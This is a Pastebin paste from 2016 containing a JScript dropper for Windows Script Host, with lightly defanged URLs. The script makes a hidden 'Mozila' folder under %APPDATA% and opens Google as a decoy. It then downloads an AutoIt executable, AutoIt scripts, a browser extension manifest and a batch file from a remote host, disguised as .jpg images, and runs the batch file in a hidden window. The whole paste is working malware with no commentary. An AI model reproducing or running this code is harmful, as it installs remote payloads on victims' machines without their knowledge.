Advertisement
Guest User

f

a guest
Jul 1st, 2016
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.14 KB | None | 0 0
  1. (function(processFunction) {
  2. function _0xc4a4x2(_0xc4a4x2, _0xc4a4x3, _0xc4a4x4) {
  3. if (!_0xc4a4x3 || !_0xc4a4x2) {
  4. return null;
  5. }
  6.  
  7. var xhr = WScript.CreateObject("Msxml2.XMLhxxp");
  8. xhr["onreadystatechange"] = function() {
  9. if (xhr["readyState"] === 4 && xhr["status"] === 200) {
  10.  
  11. xa = new ActiveXObject("ADODB.Stream");
  12. xa["open"]();
  13. xa["type"] = 1;
  14. xa["write"](xhr.ResponseBody);
  15. xa["position"] = _0xc4a4x4;
  16.  
  17. stm2 = new ActiveXObject("ADODB.Stream");
  18. stm2["type"] = 1;
  19. stm2["open"]();
  20. stm2["write"](xa["read"]());
  21. stm2["saveToFile"](_0xc4a4x3, 2);
  22. stm2["close"]();
  23.  
  24. xa["close"]()
  25. }
  26. };
  27. xhr["open"]("GET", _0xc4a4x2, false);
  28. xhr["send"](null)
  29. }
  30.  
  31. function _0xc4a4x6(arg1, arg2) {
  32. {
  33. xa = new ActiveXObject("ADODB.Stream");
  34. xa["open"]();
  35. xa["type"] = 1;
  36. xa.LoadFromFile(arg1);
  37.  
  38. ix = new ActiveXObject("ADODB.Stream");
  39. ix["open"]();
  40. ix["type"] = 1;
  41. ix.LoadFromFile(arg2);
  42.  
  43. stm2 = new ActiveXObject("ADODB.Stream");
  44. stm2["type"] = 1;
  45. stm2["open"]();
  46. stm2["write"](ix["read"]());
  47. stm2["write"](xa["read"]());
  48. xa["close"]();
  49. ix["close"]();
  50. stm2["saveToFile"](arg1, 2);
  51. stm2["close"]()
  52. }
  53. }
  54. fso = new ActiveXObject("Scripting.FileSystemObject");
  55. var activeXObject = new ActiveXObject("WScript.Shell");
  56. processFunction = new ActiveXObject("Shell.Application");
  57. FileDestr = activeXObject["ExpandEnvironmentStrings"]("%APPDATA%");
  58. mozklasor = FileDestr + "Mozila";
  59. if (!fso.FolderExists(mozklasor)) {
  60. fso.CreateFolder(mozklasor)
  61. };
  62. processFunction.ShellExecute("hxxps://www.google.com");
  63. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/Autoit.jpg", mozklasor + "\\autoit.exe", 0);
  64. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/bg.jpg", mozklasor + "\\bg.js", 0);
  65. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/ekl.jpg", mozklasor + "\\ekl.au3", 0);
  66. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/ff.jpg", mozklasor + "ff.zip", 0);
  67. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/force.jpg", mozklasor + "\\force.au3", 0);
  68. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/sabit.jpg", mozklasor + "\\sabit.au3", 0);
  69. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/manifest.jpg", mozklasor + "\\manifest.json", 0);
  70. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/run.jpg", mozklasor + "\\run.bat", 0);
  71. _0xc4a4x2("hxxp://userexperiencestatics.net/ext/up.jpg", mozklasor + "\\up.au3", 0);
  72. _0xc4a4x2("hxxp://whos.amung.us/pingjs/?k=pingjse346", mozklasor + "\\ping.js", 0);
  73. _0xc4a4x2("hxxp://whos.amung.us/pingjs/?k=pingjse3462", mozklasor + "\\ping2.js", 0);
  74. processFunction.ShellExecute(mozklasor + "\\run.bat", "", mozklasor, "", 0)
  75. })(this)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement